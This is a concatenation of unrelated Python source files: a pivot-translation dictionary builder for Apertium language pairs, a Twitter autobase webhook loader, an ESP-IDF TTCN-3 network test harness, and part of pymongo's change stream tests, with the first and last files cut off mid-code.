if curr_key not in temp_pair_dict.keys():
temp_pair_dict[curr_key] = {}
for translation in curr[curr_key]:
src_word, trg_key, trg_word, pos = translation
for backtrans in rev[trg_key]:
backtrans_key = backtrans[1]
if backtrans_key in temp_pair_dict[curr_key].keys():
temp_pair_dict[curr_key][backtrans_key] += 1
else:
temp_pair_dict[curr_key] = {backtrans_key: 1}
for k in temp_pair_dict.keys():
for m in temp_pair_dict[k].keys():
if k in temp_dict_s.keys():
if m in temp_dict_s[k].keys():
temp_dict_s[k][m]['sets'] += 1
temp_dict_s[k][m]['total'] += temp_pair_dict[k][m]
else:
temp_dict_s[k][m] = {'sets': 1, 'total': temp_pair_dict[k][m]}
else:
temp_dict_s[k] = {m: {'sets': 1, 'total': temp_pair_dict[k][m]}}
#print(pair_ctr)
for l in temp_dict_s.keys():
for t in temp_dict_s[l].keys():
if pair_ctr > 0:
ratio = float(temp_dict_s[l][t]['sets'] / pair_ctr)
else:
ratio = 0
if ratio > syn_ratio_threshold:
if (l != t):
#print(l, t, str(ratio))
if l in synonyms:
synonyms[l][t] = ratio
else:
synonyms[l] = {t: ratio}
q.task_done()
except Queue.Empty:
return
def add_syn():
while True:
try:
p = q.get()
syn_dict = {}
src = p[0]
trg = p[1]
o_pairs = other_pairs.copy()
o_pairs.remove(p)
s3 = src + '_' + trg
t3 = trg + '_' + src
for o in o_pairs:
src_flag = True
trg_flag = True
if o[0] == src:
s1 = o[0] + '_' + o[1]
s2 = o[1] + '_' + o[0]
elif o[1] == src:
s1 = o[1] + '_' + o[0]
s2 = o[0] + '_' + o[1]
else:
src_flag = False
if o[0] == trg:
t1 = o[0] + '_' + o[1]
t2 = o[1] + '_' + o[0]
elif o[1] == trg:
t1 = o[1] + '_' + o[0]
t2 = o[0] + '_' + o[1]
else:
trg_flag = False
if src_flag:
if s3 in syn_dict.keys():
syn_dict[s3].append([s1, s2, s3])
else:
syn_dict[s3] = [[s1, s2, s3]]
if trg_flag:
if t3 in syn_dict.keys():
syn_dict[t3].append([t1, t2, t3])
else:
syn_dict[t3] = [[t1, t2, t3]]
pivot_path(syn_dict)
syn_dict = {}
q.task_done()
except Queue.Empty:
return
def write_checkpoint():
while True:
try:
curr_dict, addsynonym, location = q.get()
out_list = []
for key in curr_dict.keys():
translations = curr_dict[key]
for i in translations:
word = key.split('__')[1]
out_list.append(word + '\t' + i[2] + '\t' + key.split('__')[0] + '\t' + i[1].split('__')[0] + '\t' + i[3] + '\n')
out_list = list(set(out_list))
out_list.sort()
pathway_out = pathway
if addsynonym == 1:
pathway_out = pathway + '_syn3'
elif addsynonym == 2:
pathway_out = pathway + '_syn_syn3'
elif addsynonym == 3:
pathway_out = pathway + '_syn_syn_syn3'
with open(transset_folder + 'apertium/checkpoints/checkpoint' + '_' + location + '_' + pathway_out + '_' + src_lang + '_' + trg_lang + '.txt_new', 'w') as fo:
for i in out_list:
fo.write(i)
q.task_done()
except Queue.Empty:
return
if __name__ == '__main__':
pairs = [['an', 'ca'], ['br', 'fr'], ['ca', 'it'], ['ca', 'sc'], ['cy', 'en'], ['en', 'ca'], ['en', 'es'], ['en', 'gl'],
['en', 'kk'], ['eo', 'ca'], ['eo', 'en'], ['eo', 'es'], ['eo', 'fr'], ['es', 'an'], ['es', 'ast'], ['es', 'ca'],
['es', 'gl'], ['es', 'it'], ['es', 'pt'], ['es', 'ro'], ['eu', 'en'], ['eu', 'es'], ['fr', 'ca'], ['fr', 'es'],
['is', 'en'], ['mk', 'en'], ['oc', 'ca'], ['oc', 'es'], ['oc', 'fr'], ['pt', 'ca'], ['pt', 'gl'], ['ro', 'ca'],
['sh', 'en']]
jobs = []
print('Reading files...')
for i in pairs:
p = multiprocessing.Process(name=i, target=work_pair, args=(i, dict_of_dicts))
jobs.append(p)
p.start()
for j in jobs:
j.join()
print('ALL JOINED!!!')
syn_count = 0
print('Doing synonym stuff...')
while syn_count < addsynonym:
print('add synonyms - iteration ', str(syn_count+1))
q = Queue()
num_threads = 20
other_pairs = pairs.copy()
for i in range(num_threads):
worker = Thread(target=add_selected_syn)
worker.daemon = False
worker.start()
for p in pairs:
q.put((p))
q.join()
syn_count += 1
print(len(synonyms.keys()))
if addsynonym > 0:
print('Synonym stuff done!')
extra_pairs = [['en', 'fr'], ['en', 'pt'], ['pt', 'fr'], ['fr', 'en'], ['pt', 'en'], ['fr', 'pt']]
#for i in extra_pairs:
# pairs.append(i)
print(dict_of_dicts.keys())
jobs = []
print('OTAC...')
# for i in extra_pairs:
# #att_otac(i, dict_of_dicts)
# # for i in extra_pairs:
# p = multiprocessing.Process(name=i, target=att_otac, args=(i, dict_of_dicts))
# jobs.append(p)
# p.start()
# #rev_pair = [i[1], i[0]]
# #p = multiprocessing.Process(name=rev_pair, target=att_otac, args=(rev_pair, dict_of_dicts))
# #jobs.append(p)
# #p.start()
# for j in jobs:
# j.join()
# print(dict_of_dicts.keys())
# print(len(dict_of_dicts['fr_en'].keys()))
if pathway == 'max2edges':
path_dict = {
'en_fr': (('en_eo', 'eo_fr'), ('en_es', 'es_fr'), ('en_ca', 'ca_fr')),
'fr_en': (('fr_eo', 'eo_en'), ('fr_es', 'es_en'), ('fr_ca', 'ca_en')),
'fr_pt': (('fr_ca', 'ca_pt'), ('fr_es', 'es_pt')),
'pt_fr': (('pt_ca', 'ca_fr'), ('pt_es', 'es_fr')),
'en_pt': (('en_ca', 'ca_pt'), ('en_gl', 'gl_pt'), ('en_es', 'es_pt')),
'pt_en': (('pt_ca', 'ca_en'), ('pt_gl', 'gl_en'), ('pt_es', 'es_en'))
}
elif pathway == 'max3edges':
path_dict = {
'en_fr': (('en_eo', 'eo_fr'), ('en_es', 'es_fr'), ('en_ca', 'ca_fr'), ('en_eu', 'eu_es', 'es_fr'), ('en_gl', 'gl_es', 'es_fr'), ('en_ca', 'ca_es', 'es_fr'), ('en_ca', 'ca_oc', 'oc_fr'), ('en_ca', 'ca_eo', 'eo_fr'), ('en_eo', 'eo_es', 'es_fr'), ('en_eo', 'eo_ca', 'ca_fr'), ('en_es', 'es_oc', 'oc_fr'), ('en_es', 'es_ca', 'ca_fr'), ('en_es', 'es_eo', 'eo_fr')),
'fr_en': (('fr_eo', 'eo_en'), ('fr_es', 'es_en'), ('fr_ca', 'ca_en'), ('fr_es', 'es_eu', 'eu_en'), ('fr_es', 'es_gl', 'gl_en'), ('fr_es', 'es_ca', 'ca_en'), ('fr_oc', 'oc_ca', 'ca_en'), ('fr_eo', 'eo_ca', 'ca_en'), ('fr_es', 'es_eo', 'eo_en'), ('fr_ca', 'ca_eo', 'eo_en'), ('fr_oc', 'oc_es', 'es_en'), ('fr_ca', 'ca_es', 'es_en'), ('fr_eo', 'eo_es', 'es_en')),
'fr_pt': (('fr_ca', 'ca_pt'), ('fr_es', 'es_pt'), ('fr_es', 'es_gl', 'gl_pt'), ('fr_es', 'es_ca', 'ca_pt'), ('fr_eo', 'eo_ca', 'ca_pt'), ('fr_oc', 'oc_ca', 'ca_pt'), ('fr_oc', 'oc_es', 'es_pt'), ('fr_eo', 'eo_es', 'es_pt'), ('fr_ca', 'ca_es', 'es_pt')),
'pt_fr': (('pt_ca', 'ca_fr'), ('pt_es', 'es_fr'), ('pt_gl', 'gl_es', 'es_fr'), ('pt_ca', 'ca_es', 'es_fr'), ('pt_ca', 'ca_eo', 'eo_fr'), ('pt_ca', 'ca_oc', 'oc_fr'), ('pt_es', 'es_oc', 'oc_fr'), ('pt_es', 'es_eo', 'eo_fr'), ('pt_es', 'es_ca', 'ca_fr')),
'en_pt': (('en_ca', 'ca_pt'), ('en_gl', 'gl_pt'), ('en_es', 'es_pt'), ('en_es', 'es_gl', 'gl_pt'), ('en_eo', 'eo_es', 'es_pt'), ('en_ca', 'ca_es', 'es_pt'), ('en_eu', 'eu_es', 'es_pt'), ('en_gl', 'gl_es', 'es_pt'), ('en_eo', 'eo_ca', 'ca_pt'), ('en_es', 'es_ca', 'ca_pt')),
'pt_en': (('pt_ca', 'ca_en'), ('pt_gl', 'gl_en'), ('pt_es', 'es_en'), ('pt_gl', 'gl_es', 'es_en'), ('pt_es', 'es_eo', 'eo_en'), ('pt_es', 'es_ca', 'ca_en'), ('pt_es', 'es_eu', 'eu_en'), ('pt_es', 'es_gl', 'gl_en'), ('pt_ca', 'ca_eo', 'eo_en'), ('pt_ca', 'ca_es', 'es_en'))
}
pivot_ctr = 0
while pivot_ctr < 1:
pivot_ctr += 1
print('pivot dicts')
q = Queue()
num_threads = 20
for i in range(num_threads):
worker = Thread(target=pivot_path_dict)
worker.daemon = False
worker.start()
for j in path_dict.keys():
q.put((j, path_dict))
q.join()
#
# final_pairs = [['en', 'fr'], ['fr', 'pt'], ['en', 'pt']]
# jobs = []
# print('OTAC...')
#
# for i in final_pairs:
# p = multiprocessing.Process(name=i, target=att_otac, args=(i, dict_of_dicts))
# jobs.append(p)
# p.start()
# rev_pair = [i[1], i[0]]
# p = multiprocessing.Process(name=rev_pair, target=att_otac, args=(rev_pair, dict_of_dicts))
# jobs.append(p)
# p.start()
# for j in jobs:
# j.join()
#pivot_path(path_dict)
#print(dict_of_dicts['en_fr'])
#print('Writing checkpoint "syn_"' + pathway + '...')
#for i in dict_of_dicts.keys():
# write_checkpoint(dict_of_dicts[i], addsynonym, "syn_" + pathway)
#vantar að lúppa í gegnum tilbúnu þýðingarnar áður en lokaþýðingar eru búnar til
# pivots_path_dict = {
# 'en_fr': [('en_fr', 'fr_en', 'en_fr'), ('en_pt', 'pt_en', 'en_fr')],
# 'fr_en': [('fr_pt', 'pt_fr', 'fr_en'), ('fr_pt', 'pt_fr', 'fr_en')],
# 'fr_pt': [('fr_en', 'en_fr', 'fr_pt'), ('fr_en', 'en_fr', 'fr_en')],
# 'pt_fr': [('pt_en', 'en_pt', 'pt_fr'), ('pt_en', 'en_pt', 'pt_fr')],
# 'en_pt': [('en_fr', 'fr_en', 'en_pt'), ('en_fr', 'fr_en', 'en_fr')],
# 'pt_en': [('pt_fr', 'fr_pt', 'pt_fr'), ('pt_fr', 'fr_pt', 'pt_en')]
# }
#
# print('Pivot path dicts...')
# q = Queue()
# num_threads = 20
# for i in range(num_threads):
# worker = Thread(target=pivot_path_dict)
# worker.daemon = False
# worker.start()
# for j in pivots_path_dict.keys():
# q.put((j, pivots_path_dict))
# #pivot_path(pivots_path_dict)
# q.join()
# print('Writing checkpoint "syn_"' + pathway + '_finaldicts' + '...')
# q = Queue()
# num_threads = 12
# for i in range(num_threads):
# worker = Thread(target=write_checkpoint, args=(q,))
# worker.daemon = False
# worker.start()
# for i in dict_of_dicts.keys():
# q.put((dict_of_dicts[i], addsynonym, "syn_" + pathway + '_finaldicts'))
# #write_checkpoint(dict_of_dicts[i], addsynonym, "syn_" + pathway + '_finaldicts')
# q.join()
pivots_path_dict = {
'en_fr': [('en_pt', 'pt_fr')],
'fr_en': [('fr_pt', 'pt_en')],
'fr_pt': [('fr_en', 'en_pt')],
'pt_fr': [('pt_en', 'en_fr')],
'en_pt': [('en_fr', 'fr_pt')],
'pt_en': [('pt_fr', 'fr_en')]
}
print('Pivot pivot path dicts...')
pivot_ctr = 1
while pivot_ctr < 1:
pivot_ctr += 1
q = Queue()
num_threads = 8
for i in range(num_threads):
worker = Thread(target=pivot_path_dict)
worker.daemon = False
worker.start()
for j in pivots_path_dict.keys():
q.put((j, pivots_path_dict))
#pivot_path(pivots_path_dict)
q.join()
#while syn_count < addsynonym:
while 1 == 2:
print('add synonyms - iteration ', str(syn_count+1))
q = Queue()
num_threads = 20
other_pairs = pairs.copy()
for i in range(num_threads):
worker = Thread(target=add_selected_syn)
worker.daemon = False
worker.start()
for pair in pivots_path_dict.keys():
p = pair.split('_')
q.put((p))
q.join()
syn_count += 1
print('ALL DONE! Writing to files...')
#print(dict_of_dicts['en_fr'])
for pivots in pivots_path_dict.keys():
src_lang, trg_lang = pivots.split('_')
curr_dict = dict_of_dicts[pivots]
out_list = []
for key in curr_dict.keys():
translations = curr_dict[key]
for i in translations:
word = key.split('__')[1]
out_list.append(word + '\t' + i[2] + '\t' + key.split('__')[0] + '\t' + i[1].split('__')[0] + '\t' + i[3] + '\n')
out_list = list(set(out_list))
out_list.sort()
pathway_out = pathway + '_ttac_paths' + str(addsynonym)
with open(transset_folder + 'apertium/' + 'test_' + pathway_out + '_' + src_lang + '_' + trg_lang + '.txt', 'w') as fo:
for i in out_list:
fo.write(i)
with open(transset_folder + 'apertium/' + 'before_filter_' + pathway_out + '_' + src_lang + '_' + trg_lang + '.txt', 'w') as fo:
for i in out_list:
temp = i.strip().split('\t')
pos = temp[4].strip('"').split('#')
try:
fo.write(temp[0] + '\t' + temp[1] + '\t' + temp[4].strip('"').split('#')[1] + '\n')
except:
print(temp)
sys.exit(0)
#Sækja lista af öllum orðum í ákveðnu tungumáli í skránum - sækja lista yfir það sem ekki hefur fundist
en_words = []
en_words_found = []
for i in out_list:
en_words_found.append(i.split('\t')[2].strip())
en_words_found = list(set(en_words_found))
with open(transset_folder + 'apertium/' + pathway_out + '_' + src_lang + '_' + trg_lang + '_words.txt', 'w') as fo:
for i in en_words_found:
fo.write(i + '\n')
pairs_found = []
for i in out_list:
pairs_found.append(i.split('\t')[0].strip() + '\t' + i.split('\t')[1].strip())
pairs_found = list(set(pairs_found))
pairs_found.sort()
with open(transset_folder + 'apertium/' + pathway_out + '_' + src_lang + '_' + trg_lang + '_pairs3.txt', 'w') as fo:
for i in pairs_found:
fo.write(i + '\n')
for key in dict_of_lists.keys():
with open(transset_folder + 'apertium/' + key + '_' + '_words.txt', 'w') as fo:
output_list = dict_of_lists[key]
output_list = list(set(output_list))
output_list.sort()
for i in output_list:
fo.write(i + '\n')
|
main.py
|
from ..models import Autobase as AutobaseDatabase
from .. import app
from . import default_config
from .twitter_autobase import Autobase as AutobaseApp
import logging
logger = logging.getLogger(__name__)
autobase_app = dict()
# {'app_name':object, 'app_name_2':'error'}
# Change default_config type object to dictionary
default_config_dict = dict()
tmp_dict = default_config.__dict__
for key in list(default_config.__dict__)[list(default_config.__dict__).index('CONSUMER_KEY'):]:
default_config_dict[key] = tmp_dict[key]
default_config = default_config_dict.copy()
del tmp_dict
del default_config_dict
def update_config(new_dict:dict):
config_dict = default_config.copy()
config_dict.update(new_dict)
return type('autobase config', (object,), config_dict)
for data in AutobaseDatabase.query.all():
new_dict = dict()
data_dict = data.__dict__
for key in data_dict.keys():
if key in list(default_config):
new_dict[key] = data_dict[key]
try:
autobase_app[data.name] = AutobaseApp(update_config(new_dict))
autobase_app[data.name].app_name = data.name
except Exception:
autobase_app[data.name] = 'error'
logger.error(f'app_name: {data.name}; owner_username: {data.owner.username}')
# Register webhook url to twitter
if app.config['SERVER'] == 'ngrok':
from .twitter_autobase import webhook_manager as webMan
from requests import get
from threading import Thread
from time import sleep
callback_url = webMan.connect_ngrok(app.config['NGROK_TOKEN'])
def register_webhook():
while get(callback_url).status_code != 200:
sleep(1)
for key in list(autobase_app):
if autobase_app[key] == 'error':
continue
webMan.register_webhook(
callback_url + '/callback',
autobase_app[key].app_name,
autobase_app[key].credential)
Thread(target=register_webhook).start()
elif app.config['SERVER'] == 'heroku':
# Register webhook is executed when user add new app in website
pass
else:
from sys import exit
logger.error("SERVER in .env must be 'ngrok' or 'heroku'")
exit()
|
net_suite_test.py
|
import re
import os
import socket
from threading import Thread, Event
import subprocess
import time
from shutil import copyfile
from tiny_test_fw import Utility, DUT
import ttfw_idf
stop_sock_listener = Event()
stop_io_listener = Event()
sock = None
client_address = None
manual_test = False
def io_listener(dut1):
global sock
global client_address
data = b''
while not stop_io_listener.is_set():
try:
data = dut1.expect(re.compile(r"PacketOut:\[([a-fA-F0-9]+)\]"), timeout=5)
except DUT.ExpectTimeout:
continue
if data != () and data[0] != b'':
packet_data = data[0]
print("Packet_data>{}<".format(packet_data))
response = bytearray.fromhex(packet_data.decode())
print("Sending to socket:")
packet = ' '.join(format(x, '02x') for x in bytearray(response))
print("Packet>{}<".format(packet))
if client_address is not None:
sock.sendto(response, ('127.0.0.1', 7777))
def sock_listener(dut1):
global sock
global client_address
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.settimeout(5)
server_address = '0.0.0.0'
server_port = 7771
server = (server_address, server_port)
sock.bind(server)
try:
while not stop_sock_listener.is_set():
try:
payload, client_address = sock.recvfrom(1024)
packet = ' '.join(format(x, '02x') for x in bytearray(payload))
print("Received from address {}, data {}".format(client_address, packet))
dut1.write(str.encode(packet))
except socket.timeout:
pass
finally:
sock.close()
sock = None
@ttfw_idf.idf_example_test(env_tag="Example_WIFI")
def lwip_test_suite(env, extra_data):
global stop_io_listener
global stop_sock_listener
"""
steps: |
1. Rebuilds test suite with esp32_netsuite.ttcn
2. Starts listeners on stdout and socket
3. Execute ttcn3 test suite
4. Collect result from ttcn3
"""
dut1 = env.get_dut("net_suite", "examples/system/network_tests", dut_class=ttfw_idf.ESP32DUT)
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, "net_suite.bin")
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance("net_suite", "{}KB".format(bin_size // 1024))
ttfw_idf.check_performance("net_suite", bin_size // 1024)
dut1.start_app()
thread1 = Thread(target=sock_listener, args=(dut1, ))
thread2 = Thread(target=io_listener, args=(dut1, ))
if not manual_test:
# Variables refering to esp32 ttcn test suite
TTCN_SRC = 'esp32_netsuite.ttcn'
TTCN_CFG = 'esp32_netsuite.cfg'
# System Paths
netsuite_path = os.getenv("NETSUITE_PATH")
netsuite_src_path = os.path.join(netsuite_path, "src")
test_dir = os.path.dirname(os.path.realpath(__file__))
# Building the suite
print("Rebuilding the test suite")
print("-------------------------")
# copy esp32 specific files to ttcn net-suite dir
copyfile(os.path.join(test_dir, TTCN_SRC), os.path.join(netsuite_src_path, TTCN_SRC))
copyfile(os.path.join(test_dir, TTCN_CFG), os.path.join(netsuite_src_path, TTCN_CFG))
proc = subprocess.Popen(['bash', '-c', 'cd ' + netsuite_src_path + ' && source make.sh'],
cwd=netsuite_path, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output = proc.stdout.read()
print("Note: First build step we expect failure (titan/net_suite build system not suitable for multijob make)")
print(output)
proc = subprocess.Popen(['bash', '-c', 'cd ' + netsuite_src_path + ' && make'],
cwd=netsuite_path, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
print("Note: This time all dependencies shall be generated -- multijob make shall pass")
output = proc.stdout.read()
print(output)
# Executing the test suite
thread1.start()
thread2.start()
time.sleep(2)
print("Executing the test suite")
print("------------------------")
proc = subprocess.Popen(['ttcn3_start', os.path.join(netsuite_src_path,'test_suite'), os.path.join(netsuite_src_path, TTCN_CFG)],
stdout=subprocess.PIPE)
output = proc.stdout.read()
print(output)
print("Collecting results")
print("------------------")
verdict_stats = re.search('(Verdict statistics:.*)', output)
if verdict_stats:
verdict_stats = verdict_stats.group(1)
else:
verdict_stats = b""
verdict = re.search('Overall verdict: pass', output)
if verdict:
print("Test passed!")
Utility.console_log(verdict_stats, "green")
else:
Utility.console_log(verdict_stats, "red")
raise ValueError('Test failed with: {}'.format(verdict_stats))
else:
try:
# Executing the test suite
thread1.start()
thread2.start()
time.sleep(2)
while True:
time.sleep(0.5)
except KeyboardInterrupt:
pass
print("Executing done, waiting for tests to finish")
print("-------------------------------------------")
stop_io_listener.set()
stop_sock_listener.set()
thread1.join()
thread2.join()
if __name__ == '__main__':
print("Manual execution, please build and start ttcn in a separate console")
manual_test = True
lwip_test_suite()
|
test_change_stream.py
|
# Copyright 2017 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test the change_stream module."""
import random
import os
import re
import sys
import string
import threading
import time
import uuid
from itertools import product
sys.path[0:0] = ['']
from bson import ObjectId, SON, Timestamp, encode, json_util
from bson.binary import (ALL_UUID_REPRESENTATIONS,
Binary,
STANDARD,
PYTHON_LEGACY)
from bson.raw_bson import DEFAULT_RAW_BSON_OPTIONS, RawBSONDocument
from pymongo import MongoClient
from pymongo.command_cursor import CommandCursor
from pymongo.errors import (InvalidOperation, OperationFailure,
ServerSelectionTimeoutError)
from pymongo.message import _CursorAddress
from pymongo.read_concern import ReadConcern
from pymongo.write_concern import WriteConcern
from test import client_context, unittest, IntegrationTest
from test.unified_format import generate_test_classes
from test.utils import (
EventListener, AllowListEventListener, rs_or_single_client, wait_until)
class TestChangeStreamBase(IntegrationTest):
RUN_ON_LOAD_BALANCER = True
def change_stream_with_client(self, client, *args, **kwargs):
"""Create a change stream using the given client and return it."""
raise NotImplementedError
def change_stream(self, *args, **kwargs):
"""Create a change stream using the default client and return it."""
return self.change_stream_with_client(self.client, *args, **kwargs)
def client_with_listener(self, *commands):
"""Return a client with a AllowListEventListener."""
listener = AllowListEventListener(*commands)
client = rs_or_single_client(event_listeners=[listener])
self.addCleanup(client.close)
return client, listener
def watched_collection(self, *args, **kwargs):
"""Return a collection that is watched by self.change_stream()."""
# Construct a unique collection for each test.
collname = '.'.join(self.id().rsplit('.', 2)[1:])
return self.db.get_collection(collname, *args, **kwargs)
def generate_invalidate_event(self, change_stream):
"""Cause a change stream invalidate event."""
raise NotImplementedError
def generate_unique_collnames(self, numcolls):
"""Generate numcolls collection names unique to a test."""
collnames = []
for idx in range(1, numcolls + 1):
collnames.append(self.id() + '_' + str(idx))
return collnames
def get_resume_token(self, invalidate=False):
"""Get a resume token to use for starting a change stream."""
# Ensure targeted collection exists before starting.
coll = self.watched_collection(write_concern=WriteConcern('majority'))
coll.insert_one({})
if invalidate:
with self.change_stream(
[{'$match': {'operationType': 'invalidate'}}]) as cs:
if isinstance(cs._target, MongoClient):
self.skipTest(
"cluster-level change streams cannot be invalidated")
self.generate_invalidate_event(cs)
return cs.next()['_id']
else:
with self.change_stream() as cs:
coll.insert_one({'data': 1})
return cs.next()['_id']
def get_start_at_operation_time(self):
"""Get an operationTime. Advances the operation clock beyond the most
recently returned timestamp."""
optime = self.client.admin.command("ping")["operationTime"]
return Timestamp(optime.time, optime.inc + 1)
def insert_one_and_check(self, change_stream, doc):
"""Insert a document and check that it shows up in the change stream."""
raise NotImplementedError
def kill_change_stream_cursor(self, change_stream):
"""Cause a cursor not found error on the next getMore."""
cursor = change_stream._cursor
address = _CursorAddress(cursor.address, cursor._CommandCursor__ns)
client = self.watched_collection().database.client
client._close_cursor_now(cursor.cursor_id, address)
class APITestsMixin(object):
def test_watch(self):
with self.change_stream(
[{'$project': {'foo': 0}}], full_document='updateLookup',
max_await_time_ms=1000, batch_size=100) as change_stream:
self.assertEqual([{'$project': {'foo': 0}}],
change_stream._pipeline)
self.assertEqual('updateLookup', change_stream._full_document)
self.assertEqual(1000, change_stream._max_await_time_ms)
self.assertEqual(100, change_stream._batch_size)
self.assertIsInstance(change_stream._cursor, CommandCursor)
self.assertEqual(
1000, change_stream._cursor._CommandCursor__max_await_time_ms)
self.watched_collection(
write_concern=WriteConcern("majority")).insert_one({})
_ = change_stream.next()
resume_token = change_stream.resume_token
with self.assertRaises(TypeError):
self.change_stream(pipeline={})
with self.assertRaises(TypeError):
self.change_stream(full_document={})
# No Error.
with self.change_stream(resume_after=resume_token):
pass
def test_try_next(self):
# ChangeStreams only read majority committed data so use w:majority.
coll = self.watched_collection().with_options(
write_concern=WriteConcern("majority"))
coll.drop()
coll.insert_one({})
self.addCleanup(coll.drop)
with self.change_stream(max_await_time_ms=250) as stream:
self.assertIsNone(stream.try_next()) # No changes initially.
coll.insert_one({}) # Generate a change.
# On sharded clusters, even majority-committed changes only show
# up once an event that sorts after it shows up on the other
# shard. So, we wait on try_next to eventually return changes.
wait_until(lambda: stream.try_next() is not None,
"get change from try_next")
def test_try_next_runs_one_getmore(self):
listener = EventListener()
client = rs_or_single_client(event_listeners=[listener])
# Connect to the cluster.
client.admin.command('ping')
listener.results.clear()
# ChangeStreams only read majority committed data so use w:majority.
coll = self.watched_collection().with_options(
write_concern=WriteConcern("majority"))
coll.drop()
# Create the watched collection before starting the change stream to
# skip any "create" events.
coll.insert_one({'_id': 1})
self.addCleanup(coll.drop)
with self.change_stream_with_client(
client, max_await_time_ms=250) as stream:
self.assertEqual(listener.started_command_names(), ["aggregate"])
listener.results.clear()
# Confirm that only a single getMore is run even when no documents
# are returned.
self.assertIsNone(stream.try_next())
self.assertEqual(listener.started_command_names(), ["getMore"])
listener.results.clear()
self.assertIsNone(stream.try_next())
self.assertEqual(listener.started_command_names(), ["getMore"])
listener.results.clear()
# Get at least one change before resuming.
coll.insert_one({'_id': 2})
wait_until(lambda: stream.try_next() is not None,
"get change from try_next")
listener.results.clear()
# Cause the next request to initiate the resume process.
self.kill_change_stream_cursor(stream)
listener.results.clear()
# The sequence should be:
# - getMore, fail
# - resume with aggregate command
# - no results, return immediately without another getMore
self.assertIsNone(stream.try_next())
self.assertEqual(
listener.started_command_names(), ["getMore", "aggregate"])
listener.results.clear()
# Stream still works after a resume.
coll.insert_one({'_id': 3})
wait_until(lambda: stream.try_next() is not None,
"get change from try_next")
self.assertEqual(set(listener.started_command_names()),
set(["getMore"]))
self.assertIsNone(stream.try_next())
def test_batch_size_is_honored(self):
listener = EventListener()
client = rs_or_single_client(event_listeners=[listener])
# Connect to the cluster.
client.admin.command('ping')
listener.results.clear()
# ChangeStreams only read majority committed data so use w:majority.
coll = self.watched_collection().with_options(
write_concern=WriteConcern("majority"))
coll.drop()
# Create the watched collection before starting the change stream to
# skip any "create" events.
coll.insert_one({'_id': 1})
self.addCleanup(coll.drop)
# Expected batchSize.
expected = {'batchSize': 23}
with self.change_stream_with_client(
client, max_await_time_ms=250, batch_size=23) as stream:
# Confirm that batchSize is honored for initial batch.
cmd = listener.results['started'][0].command
self.assertEqual(cmd['cursor'], expected)
listener.results.clear()
# Confirm that batchSize is honored by getMores.
self.assertIsNone(stream.try_next())
cmd = listener.results['started'][0].command
key = next(iter(expected))
self.assertEqual(expected[key], cmd[key])
# $changeStream.startAtOperationTime was added in 4.0.0.
@client_context.require_version_min(4, 0, 0)
def test_start_at_operation_time(self):
optime = self.get_start_at_operation_time()
coll = self.watched_collection(
write_concern=WriteConcern("majority"))
ndocs = 3
coll.insert_many([{"data": i} for i in range(ndocs)])
with self.change_stream(start_at_operation_time=optime) as cs:
for i in range(ndocs):
cs.next()
def _test_full_pipeline(self, expected_cs_stage):
client, listener = self.client_with_listener("aggregate")
results = listener.results
with self.change_stream_with_client(
client, [{'$project': {'foo': 0}}]) as _:
pass
self.assertEqual(1, len(results['started']))
command = results['started'][0]
self.assertEqual('aggregate', command.command_name)
self.assertEqual([
{'$changeStream': expected_cs_stage},
{'$project': {'foo': 0}}],
command.command['pipeline'])
def test_full_pipeline(self):
"""$changeStream must be the first stage in a change stream pipeline
sent to the server.
"""
self._test_full_pipeline({})
def test_iteration(self):
with self.change_stream(batch_size=2) as change_stream:
num_inserted = 10
self.watched_collection().insert_many(
[{} for _ in range(num_inserted)])
inserts_received = 0
for change in change_stream:
self.assertEqual(change['operationType'], 'insert')
inserts_received += 1
if inserts_received == num_inserted:
break
self._test_invalidate_stops_iteration(change_stream)
def _test_next_blocks(self, change_stream):
inserted_doc = {'_id': ObjectId()}
changes = []
t = threading.Thread(
target=lambda: changes.append(change_stream.next()))
t.start()
# Sleep for a bit to prove that the call to next() blocks.
time.sleep(1)
self.assertTrue(t.is_alive())
self.assertFalse(changes)
self.watched_collection().insert_one(inserted_doc)
# Join with large timeout to give the server time to return the change,
# in particular for shard clusters.
t.join(30)
self.assertFalse(t.is_alive())
self.assertEqual(1, len(changes))
self.assertEqual(changes[0]['operationType'], 'insert')
self.assertEqual(changes[0]['fullDocument'], inserted_doc)
def test_next_blocks(self):
"""Test that next blocks until a change is readable"""
# Use a short await time to speed up the test.
with self.change_stream(max_await_time_ms=250) as change_stream:
self._test_next_blocks(change_stream)
def test_aggregate_cursor_blocks(self):
"""Test that an aggregate cursor blocks until a change is readable."""
with self.watched_collection().aggregate(
[{'$changeStream': {}}], maxAwaitTimeMS=250) as change_stream:
self._test_next_blocks(change_stream)
def test_concurrent_close(self):
"""Ensure a ChangeStream can be closed from another thread."""
# Use a short await time to speed up the test.
with self.change_stream(max_await_time_ms=250) as change_stream:
def iterate_cursor():
for _ in change_stream:
pass
t = threading.Thread(target=iterate_cursor)
t.start()
self.watched_collection().insert_one({})
time.sleep(1)
change_stream.close()
t.join(3)
self.assertFalse(t.is_alive())
def test_unknown_full_document(self):
"""Must rely on the server to raise an error on unknown fullDocument.
"""
try:
with self.change_stream(full_document='notValidatedByPyMongo'):
pass
except OperationFailure:
pass
def test_change_operations(self):
"""Test each operation type."""
expected_ns = {'db': self.watched_collection().database.name,
'coll': self.watched_collection().name}
with self.change_stream() as change_stream:
# Insert.
inserted_doc = {'_id': ObjectId(), 'foo': 'bar'}
self.watched_collection().insert_one(inserted_doc)
change = change_stream.next()
self.assertTrue(change['_id'])
self.assertEqual(change['operationType'], 'insert')
self.assertEqual(change['ns'], expected_ns)
self.assertEqual(change['fullDocument'], inserted_doc)
# Update.
update_spec = {'$set': {'new': 1}, '$unset': {'foo': 1}}
self.watched_collection().update_one(inserted_doc, update_spec)
change = change_stream.next()
self.assertTrue(change['_id'])
self.assertEqual(change['operationType'], 'update')
self.assertEqual(change['ns'], expected_ns)
self.assertNotIn('fullDocument', change)
expected_update_description = {
'updatedFields': {'new': 1},
'removedFields': ['foo']}
if client_context.version.at_least(4, 5, 0):
